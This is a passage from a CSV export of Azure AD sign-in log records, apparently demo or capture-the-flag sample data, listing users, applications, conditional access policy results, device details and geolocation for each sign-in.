0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a54beb90-f65e-4146-ae84-8533dca02700,SigninLogs,Sucess,47.68061829,-122.1869888
+425,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6f7a7811-5cc0-4954-aeca-302db7bb1af0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",3258d1cf-40dd-4a8d-9bcd-c61b75423b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3258d1cf-40dd-4a8d-9bcd-c61b75423b00,SigninLogs,Sucess,32.32146072,34.85319901
+426,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:17.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5222cbe-e159-458a-bc78-2e6899ef0f1a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8303a9c8-e3cd-4170-aa12-9fba25111b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,8303a9c8-e3cd-4170-aa12-9fba25111b00,SigninLogs,Sucess,33.7984581,-84.38828278
+427,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:19.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1b872186-6b88-4309-ab05-a4c3ff149075,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71d7ba06-8885-45d4-a319-08fc0b601900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,71d7ba06-8885-45d4-a319-08fc0b601900,SigninLogs,Sucess,33.7984581,-84.38828278
+428,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:55.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",7cccc312-d1e5-411d-a6d5-f8504f2a1f00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7cccc312-d1e5-411d-a6d5-f8504f2a1f00,SigninLogs,Sucess,51.4458313,-0.969720006
+429,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:14.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:04,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",73238be9-0fa9-467e-aa3e-6d7965b86500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,73238be9-0fa9-467e-aa3e-6d7965b86500,SigninLogs,Sucess,35.01296997,-80.93171692
+430,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:48.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c7188f70-f4dd-4b1d-a319-76c7084b2bd1,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",9da4e503-60a4-4a4f-8364-398ec63f5800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,9da4e503-60a4-4a4f-8364-398ec63f5800,SigninLogs,Sucess,32.32146072,34.85319901
+431,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:01.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,5f996146-33d7-43c2-927c-cdb91348e5e7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f1960fd9-1bc9-46c5-8a44-ddea17cb1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f1960fd9-1bc9-46c5-8a44-ddea17cb1900,SigninLogs,Failed,33.7984581,-84.38828278
+432,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:36.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': 